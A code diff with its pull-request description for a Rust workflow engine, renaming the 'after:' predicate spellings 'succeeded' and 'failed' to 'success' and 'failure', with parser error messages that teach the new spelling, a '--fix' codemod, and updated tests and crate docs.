     let parsed = parse(&yaml, FileId::new(0), ParseMode::Strict).expect("parse");
     let honest = check(&parsed).certificate;

--- a/crates/nika-verb-agent/src/intrinsic.rs
+++ b/crates/nika-verb-agent/src/intrinsic.rs
@@ -277,7 +277,7 @@ workflow:
 tasks:
   a:
     after:
-      ghost: succeeded
+      ghost: success
     exec:
       command: ["echo", "x"]
 "#;

--- a/crates/nika-verb-agent/tests/research_conformance.rs
+++ b/crates/nika-verb-agent/tests/research_conformance.rs
@@ -332,7 +332,7 @@ workflow:
 tasks:
   a:
     after:
-      ghost: succeeded
+      ghost: success
     exec:
       command: ["echo", "x"]
 "#;

--- a/crates/nika-vocab/public-api.txt
+++ b/crates/nika-vocab/public-api.txt
@@ -9,9 +9,9 @@ pub use nika_vocab::Policy
 pub use nika_vocab::PolicyViolation
 pub mod nika_vocab::after
 pub enum nika_vocab::after::AfterPredicate
-pub nika_vocab::after::AfterPredicate::Failed
+pub nika_vocab::after::AfterPredicate::Failure
 pub nika_vocab::after::AfterPredicate::Skipped
-pub nika_vocab::after::AfterPredicate::Succeeded
+pub nika_vocab::after::AfterPredicate::Success
 pub nika_vocab::after::AfterPredicate::Terminal
 impl nika_vocab::after::AfterPredicate
 pub fn nika_vocab::after::AfterPredicate::all() -> &'static [&'static str]
@@ -52,6 +52,8 @@ impl<T> core::clone::CloneToUninit for nika_vocab::after::AfterPredicate where T
 pub unsafe fn nika_vocab::after::AfterPredicate::clone_to_uninit(&self, dest: *mut u8)
 impl<T> core::convert::From<T> for nika_vocab::after::AfterPredicate
 pub fn nika_vocab::after::AfterPredicate::from(t: T) -> T
+pub fn nika_vocab::after::dead_spelling_respelling(s: &str) -> core::option::Option<&'static str>
+pub fn nika_vocab::after::predicate_refusal(task: &str, target: &str, spelling: &str) -> alloc::string::String
 pub mod nika_vocab::assert
 #[non_exhaustive] pub enum nika_vocab::assert::AssertLevel
 pub nika_vocab::assert::AssertLevel::StaticProof
@@ -967,9 +969,9 @@ pub unsafe fn nika_vocab::when_gate::WhenGate::clone_to_uninit(&self, dest: *mut
 impl<T> core::convert::From<T> for nika_vocab::when_gate::WhenGate
 pub fn nika_vocab::when_gate::WhenGate::from(t: T) -> T
 pub enum nika_vocab::AfterPredicate
-pub nika_vocab::AfterPredicate::Failed
+pub nika_vocab::AfterPredicate::Failure
 pub nika_vocab::AfterPredicate::Skipped
-pub nika_vocab::AfterPredicate::Succeeded
+pub nika_vocab::AfterPredicate::Success
 pub nika_vocab::AfterPredicate::Terminal
 impl nika_vocab::after::AfterPredicate
 pub fn nika_vocab::after::AfterPredicate::all() -> &'static [&'static str]

--- a/crates/nika-vocab/src/after.rs
+++ b/crates/nika-vocab/src/after.rs
@@ -6,8 +6,17 @@
 //! An `after:` entry is a map `{producer-task: predicate}`; each entry
 //! is one CONTROL edge whose predicate names the producer states that
 //! admit the consumer. The predicate set is CLOSED (`NIKA-DAG-005`
-//! otherwise) and `terminal` includes `cancelled` (the resolved W2-Q2
-//! witness — « run once X is settled, whatever happened »).
+//! otherwise) and speaks the R5 outcome-class spellings (spec #118 ·
+//! LAW-GRAMMAR-0231): `success` · `failure` · `skipped` · `terminal`,
+//! where `terminal` includes `cancelled` (the resolved W2-Q2 witness —
+//! « run once X is settled, whatever happened »). The pre-R5 participial
+//! spellings (`succeeded` · `failed`) are DEAD FORMS: they refuse
+//! TEACHING (the respelling + the `nika check --fix` repair), never a
+//! bare unknown-predicate message — the C2 flag-day precedent
+//! (`NIKA-VALUES-001/002`), and the teaching text lives here because the
+//! message vocabulary's home is the vocabulary crate (the `dead_form.rs`
+//! · `keys.rs` pattern — the 15k wall funds no message strings in
+//! `nika-schema`).
 
 use std::fmt;
 
@@ -15,9 +24,9 @@ use std::fmt;
 #[derive(Debug, Clone, Copy, PartialEq, Eq)]
 pub enum AfterPredicate {
     /// Admits when the producer settles `success`.
-    Succeeded,
+    Success,
     /// Admits when the producer settles `failure`.
-    Failed,
+    Failure,
     /// Admits when the producer settles `skipped`.
     Skipped,
     /// Admits on ANY settled state — `success` · `failure` · `skipped`
@@ -31,8 +40,8 @@ impl AfterPredicate {
     #[must_use]
     pub fn parse(s: &str) -> Option<Self> {
         match s {
-            "succeeded" => Some(Self::Succeeded),
-            "failed" => Some(Self::Failed),
+            "success" => Some(Self::Success),
+            "failure" => Some(Self::Failure),
             "skipped" => Some(Self::Skipped),
             "terminal" => Some(Self::Terminal),
             _ => None,
@@ -43,8 +52,8 @@ impl AfterPredicate {
     #[must_use]
     pub fn as_str(self) -> &'static str {
         match self {
-            Self::Succeeded => "succeeded",
-            Self::Failed => "failed",
+            Self::Success => "success",
+            Self::Failure => "failure",
             Self::Skipped => "skipped",
             Self::Terminal => "terminal",
         }
@@ -54,7 +63,41 @@ impl AfterPredicate {
     /// completion · the DAG-005 message).
     #[must_use]
     pub fn all() -> &'static [&'static str] {
-        &["succeeded", "failed", "skipped", "terminal"]
+        &["success", "failure", "skipped", "terminal"]
+    }
+}
+
+/// The R5 dead spellings — the participial forms the flag-day killed
+/// (spec #118 · LAW-GRAMMAR-0231 · `succeeded`→`success` ·
+/// `failed`→`failure` · `skipped`/`terminal` unchanged). `Some(respelling)`
+/// when `s` is a dead spelling, `None` otherwise — the caller teaches
+/// only what it can name.
+#[must_use]
+pub fn dead_spelling_respelling(s: &str) -> Option<&'static str> {
+    match s {
+        "succeeded" => Some("success"),
+        "failed" => Some("failure"),
+        _ => None,
+    }
+}
+
+/// The `NIKA-DAG-005` refusal text for an out-of-set `after:` predicate.
+/// A dead spelling refuses TEACHING — the respelling and the
+/// `nika check --fix` repair (mode-independent, decided before the
+/// generic check, the dead-form doctrine); any other out-of-set spelling
+/// names the closed set.
+#[must_use]
+pub fn predicate_refusal(task: &str, target: &str, spelling: &str) -> String {
+    match dead_spelling_respelling(spelling) {
+        Some(to) => format!(
+            "task `{task}` after.{target}: `{spelling}` is a dead predicate spelling \
+             (R5 · spec #118 — the outcome-class rename) — respell as `{to}` \
+             (`nika check --fix` applies it)"
+        ),
+        None => format!(
+            "task `{task}` after.{target}: `{spelling}` is not a predicate — \
+             the set is closed: success · failure · skipped · terminal"
+        ),
     }
 }
 
@@ -78,9 +121,39 @@ mod tests {
 
     #[test]
     fn parse_refuses_outside_the_set() {
-        // The DAG-005 class — near-misses never coerce.
-        for bad in ["passed", "success", "SUCCEEDED", "done", ""] {
+        // The DAG-005 class — near-misses AND the R5 dead spellings
+        // never coerce.
+        for bad in ["passed", "succeeded", "failed", "SUCCESS", "done", ""] {
             assert!(AfterPredicate::parse(bad).is_none(), "{bad}");
         }
+    }
+
+    #[test]
+    fn dead_spellings_respell_one_to_one() {
+        assert_eq!(dead_spelling_respelling("succeeded"), Some("success"));
+        assert_eq!(dead_spelling_respelling("failed"), Some("failure"));
+        // The unchanged pair is NOT a dead form — it parses today.
+        assert_eq!(dead_spelling_respelling("skipped"), None);
+        assert_eq!(dead_spelling_respelling("terminal"), None);
+        assert_eq!(dead_spelling_respelling("passed"), None);
+    }
+
+    #[test]
+    fn dead_spelling_refusal_teaches_the_respelling_and_the_repair() {
+        let m = predicate_refusal("deploy", "tests", "succeeded");
+        assert!(m.contains("task `deploy` after.tests"), "{m}");
+        assert!(m.contains("dead predicate spelling"), "{m}");
+        assert!(m.contains("respell as `success`"), "{m}");
+        assert!(m.contains("nika check --fix"), "{m}");
+        let m = predicate_refusal("deploy", "tests", "failed");
+        assert!(m.contains("respell as `failure`"), "{m}");
+    }
+
+    #[test]
+    fn unknown_spelling_refusal_names_the_closed_set() {
+        let m = predicate_refusal("deploy", "tests", "passed");
+        assert!(m.contains("is not a predicate"), "{m}");
+        assert!(m.contains("success · failure · skipped · terminal"), "{m}");
+        assert!(!m.contains("dead predicate spelling"), "{m}");
     }
 }

--- a/docs/crate-specs/nika-migrate.md
+++ b/docs/crate-specs/nika-migrate.md
@@ -4,7 +4,7 @@
 |---|---|
 | Status | **ADMITTED 2026-07-15** — a size-cap descent of `nika-cli`. W-COMP « the composition » added CLI surface that pushed `nika-cli` past the 15 000 prod-LOC hard cap; per the unit-target discipline (D-2026-07-09-N1, one architectural unit may span N workspace members — `nika-cli` stays the operator front door) the widest self-contained leaf descends. The `nika-source` / `nika-vocab` descents are the exact precedent. |
 | Layer | **L0** — pure `std`, zero I/O, zero async, zero deps. |
-| Design | The machine-applicable envelope migrations for `.nika.yaml` files, in two waves: `w1` (the map — `workflow: <scalar>` + `tasks:` sequence → `workflow:` object + task map, hoisting a stray top-level `description:`) and `w2` (equivalence-or-stop flow migration — `depends_on` + body `tasks.*` reads → `with:` bindings + `after:` predicates, stopping honestly with named diagnostics when the shape is ambiguous). These are the repairs `nika check --fix` applies when the parser refuses a dead-form document; the old form is repairable, never executable (there is no legacy parser path). Line-based and structure-aware: comments, blank lines and source order are preserved byte-for-byte outside the transformed shapes, and `w1` is idempotent by contract (a migrated document returns `None`). |
+| Design | The machine-applicable envelope migrations for `.nika.yaml` files, in four waves: `w1` (the map — `workflow: <scalar>` + `tasks:` sequence → `workflow:` object + task map, hoisting a stray top-level `description:`), `w2` (equivalence-or-stop flow migration — `depends_on` + body `tasks.*` reads → `with:` bindings + `after:` predicates, stopping honestly with named diagnostics when the shape is ambiguous), `esplit` (the C2 four-authority flag-day — `vars:` classified into `inputs:`/`const:`) and `predicates` (the R5 outcome-class respelling — `succeeded`→`success` · `failed`→`failure` in `after:` blocks, 1:1 mechanical). These are the repairs `nika check --fix` applies when the parser refuses a dead-form document; the old form is repairable, never executable (there is no legacy parser path). Line-based and structure-aware: comments, blank lines and source order are preserved byte-for-byte outside the transformed shapes, and every wave is idempotent by contract (a migrated document returns `None`/`Clean`). |
 | Name | `nika-migrate` (honest: the *migrations* the fix verb applies, not the fix verb itself). |
 | LOC budget | ≤15000 src (admitted at ~900 prod LOC). ≤1500/file, ≤100/fn. |
 | Deps | none — pure `std` string transforms (`std::collections::BTreeSet` for the W2 binding-name allocator). |
@@ -44,11 +44,22 @@ pub enum W2Outcome {
 
 /// Apply the W2 (equivalence-or-stop) migration.
 pub fn w2(source: &str) -> W2Outcome;
+
+/// The E-split verdict (changed-or-stop, plus the idempotence class).
+pub enum EsplitOutcome { /* Changed(String, Vec<String>) · Clean · Stop(Vec<String>) */ }
+
+/// Apply the C2 E-split codemod (`vars:` → `inputs:`/`const:`).
+pub fn esplit(source: &str) -> EsplitOutcome;
+
+/// Apply the R5 predicate codemod (`succeeded`→`success` ·
+/// `failed`→`failure` in `after:` blocks). `None` = idempotent-clean.
+pub fn predicates(source: &str) -> Option<String>;
 ```
 
 Everything else in the crate (the line scanners, the surgery planner, the
-island/deps/with analysis) is private — the two functions and the one enum
-are the whole surface the `fix` verb names.
+island/deps/with analysis, the flow/block value flippers) is private — the
+functions and the two verdict enums are the whole surface the `fix` verb
+names.
 
 ## 3 · Gates
 

--- a/docs/crate-specs/nika-vocab.md
+++ b/docs/crate-specs/nika-vocab.md
@@ -31,7 +31,7 @@ and the schema crate remains the unit's only front door. No consumer names
 ## 2 · Public API (module-per-field)
 
 ```rust
-pub mod after;           // AfterPredicate — the closed after: predicate set
+pub mod after;           // AfterPredicate — the closed after: set + the R5 dead-spelling teachings
 pub mod capture;         // CaptureMode — stdout/stderr/combined/structured
 pub mod decode;          // DecodeMode — text/json/jsonl/bytes
 pub mod duration;        // parse_go_duration + GoDurationError


### PR DESCRIPTION
# The R5 predicates wave — `after:` speaks `success` · `failure`

Spec **#118** (the engine's `SPEC_PIN` already sits at `ea96061`):
`after:` predicates speak the outcome-class spellings —
`succeeded`→`success` · `failed`→`failure` · `skipped`/`terminal`
UNCHANGED (LAW-GRAMMAR-0231 · tombstone
`after-participial-predicate-spellings`). The engine learns the new set,
the old spellings refuse TEACHING, `nika check --fix` respells, and the
four pre-censused ledgers (PR #669) hit 0 and delete themselves.

## The teaching-code decision: ONE code — `NIKA-DAG-005`

The dead spellings refuse on **NIKA-DAG-005**, never a minted
house-only code. Evidence:

- The spec at the pin registers **no** separate code: `05-errors.md` —
  « `NIKA-DAG-005` · `after:` predicate outside the closed set
  (`success` · `failure` · `skipped` · `terminal`) ». Post-R5 the dead
  spellings ARE simply outside the closed set; conformance fixture
  `dag-topology/016-after-unknown-predicate` expects `NIKA-DAG-005`.
- The `every_emittable_code_is_registered` ratchet pins every code the
  engine can emit against the vendored canon — a house-only mint reds
  it.
- DAG-005's payload already carries the out-of-set spelling (the lints
  ledger keyed on `UnknownAfterPredicate { predicate, .. }`), so the
  teaching rides the same variant: it gains a computed `message` field
  (the `DeadValueForm` `#[error("{message}")]` precedent) built by
  `nika_vocab::after::predicate_refusal` — message vocabulary lives in
  the vocabulary crate (`dead_form.rs` · `keys.rs` pattern · the 15k
  wall funds no message strings in `nika-schema`). The refusal is
  decided AT THE PARSER, before any generic path, in BOTH parse modes
  (the C2 `NIKA-VALUES-001/002` doctrine), pinned by
  `r5_dead_predicate_spellings_refuse_teaching_in_both_modes`.

Refusal verbatim (real binary):

```
PARSE ✗  [NIKA-DAG-005] task `test` after.build: `succeeded` is a dead predicate spelling (R5 · spec #118 — the outcome-class rename) — respell as `success` (`nika check --fix` applies it)
PARSE ✗  [NIKA-DAG-005] task `b` after.a: `failed` is a dead predicate spelling (R5 · spec #118 — the outcome-class rename) — respell as `failure` (`nika check --fix` applies it)
PARSE ✗  [NIKA-DAG-005] task `b` after.a: `passed` is not a predicate — the set is closed: success · failure · skipped · terminal
```

## The codemod arm (`nika check --fix`)

`nika_migrate::predicates` — the 1:1 mechanical respelling, wired into
the fix loop beside the esplit arm. Structure-aware (flow + block
forms, quoted values, comments preserved, idempotent) and guarded (a
task named `after` or `succeeded` never trips it; a `when:` status
comparison is the DAG-007 class, never touched). One demo, real binary:

```diff
   test:
-    after: { build: succeeded }
+    after: { build: success }
     exec: { command: ["true"] }
   notify:
     after:
-      test: failed
+      test: failure
     exec: { command: ["true"] }
```

```
 ✔ FIX  r5-predicates `the dead predicate spellings (succeeded · failed)` → `success · failure in after: blocks`
 ✔ FIX  1 repair applied · re-audit below   →  the final check is GREEN
```

A genuinely-unknown predicate (`passed`) has no mechanical repair — the
codemod returns Clean, the file is untouched, the closed-set teaching
stands (pinned by `unknown_predicate_has_no_mechanical_repair`). The
`w2` migration now EMITS `after: {d: success}` — the codemod never
emits a spelling its own parser refuses (pinned by
`w2_emits_the_r5_predicate_spelling`).

## Ledger deletions — each count 0, verified at the pin

| ledger | rows at PR #669 | now | proof |
|---|---|---|---|
| core (`conformance_core.rs`) | 8 R5 rows | 0 (only the R3b-stale `envelope/010` remains) | `core_conformance_suite` green at `NIKA_SPEC_DIR=/tmp/spec-at-pin` |
| deep (`conformance_deep.rs`) | 7 R5 rows | 0 — the ledger stands empty, CLOSED note per house style | `deep_conformance_suite` green at the pin |
| gate-matrix (`gate_matrix_conformance.rs`) | 36 cells gapped on NIKA-DAG-005 | the R5-gap block + `r5_gapped == 36` pin deleted — all 36 cells verdict on the normal path | `gate_matrix_cells_match_the_model_authored_expectations` green at the pin |
| lints (`lints_one_obvious_way.rs`) | 12 fixtures keyed on the DAG-005 payload | the R5 arm + `r5_gapped == 12` pin deleted — fixtures rejoin the exact-equality verdict path | `lint_fixture_corpus` green at the pin |

## LOC deltas vs the 15k wall

- **nika-cli**: was **15,003 at main — the ratchet was RED** (PR #674's
  preflight added +13 over a 14,990 floor). The wave funds the descent:
  14,999 (the fix.rs module-doc rewrite the arm required anyway · the
  `write_atomic` wrapper inlined to `nika_migrate::repair` — its test
  duplicated the migrate seam's own · explain.rs doc tightening). Net
  for the wave: −4.
- **nika-schema**: 14,999 → 15,000 EXACT (+1 net: the parser's
  `message:` field, funded by the `#[error(…)]` collapse and doc
  tightening; the `AfterEntries` alias stays — clippy type-complexity
  demands it). tasks.rs file LOC 1,494/1,500.
- nika-vocab +43 (the dead-spelling vocabulary) · nika-migrate +230
  (the codemod, well under cap).

`bash scripts/ci/check-crate-size.sh`: **OK all crates ≤ 15000 LOC**.

## The blast radius (96 files + 1 new)

vocab flip + teaching API · parser arm · analyzer/edges admits-mapping
renames · lints suggestions + variant uses · LSP completion + vocab ·
onboard briefs · graph docs · explain.rs · every test fixture across
cli/runtime/schema/lsp/mcp/dap/display/graph/verb-agent · pack
examples/templates (byte-parity with the pin where R5 is the only
delta) + vendored canon DAG-005 row + manifest re-hash (pack integrity
green).

## Gates

- `cargo test --workspace --lib` — green (0 failed).
- `cargo test --tests --no-fail-fast` for every touched crate with
  `NIKA_SPEC_DIR=/tmp/spec-at-pin` — green; the one
  `wizard_pty::colour_lives_on_a_terminal_and_no_color_kills_every_escape`
  failure is the pre-existing local PTY flake (ignored per house
  instruction).
- `cargo clippy --workspace --all-targets -- -D warnings` — 0.
- `cargo fmt --all -- --check` — clean.
- `bash scripts/hygiene/check-all.sh` — 0 RED (35 green / 4 yellow, all
  yellows pre-existing).
- public-api.txt: vocab (2 variant renames ×2 + 2 fns) · schema (+2,
  the `message` field) · migrate (+1) — append-only, regenerated with
  the CI-pinned cargo-public-api 0.51.0; the migrate `write_atomic`
  line keeps the committed ubuntu form (local mac render skews it —
  adopt the CI artifact if the `diff` job disagrees).
